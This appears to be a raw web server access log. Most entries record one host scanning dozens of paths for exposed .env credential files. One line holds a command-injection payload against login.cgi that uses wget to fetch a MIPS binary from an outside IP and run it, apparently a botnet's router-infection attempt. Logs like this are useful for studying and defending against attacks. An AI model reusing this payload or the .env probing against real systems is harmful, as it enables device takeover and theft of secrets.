178.62.36.21 - - [04/Jul/2022:02:49:15 +0200] "GET //prod/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:16 +0200] "GET //production/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:17 +0200] "GET //pub/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:17 +0200] "GET //public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:17 +0200] "GET //rest/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:18 +0200] "GET //route/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:18 +0200] "GET //src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:18 +0200] "GET //stag/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:19 +0200] "GET //staging/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:19 +0200] "GET //staging2/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:49:19 +0200] "GET //static/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.7.214.104 - - [04/Jul/2022:02:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:08 +0200] "GET //stats/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:10 +0200] "GET //storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:10 +0200] "GET //system/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:11 +0200] "GET //temp/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:11 +0200] "GET //test/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:12 +0200] "GET //tests/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
71.172.81.20 - - [04/Jul/2022:02:50:12 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
178.62.36.21 - - [04/Jul/2022:02:50:12 +0200] "GET //tmp/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:13 +0200] "GET //vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:14 +0200] "GET //vendor/laravel/.env HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:16 +0200] "GET //web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:17 +0200] "GET //v1/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.62.36.21 - - [04/Jul/2022:02:50:18 +0200] "GET //v2/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
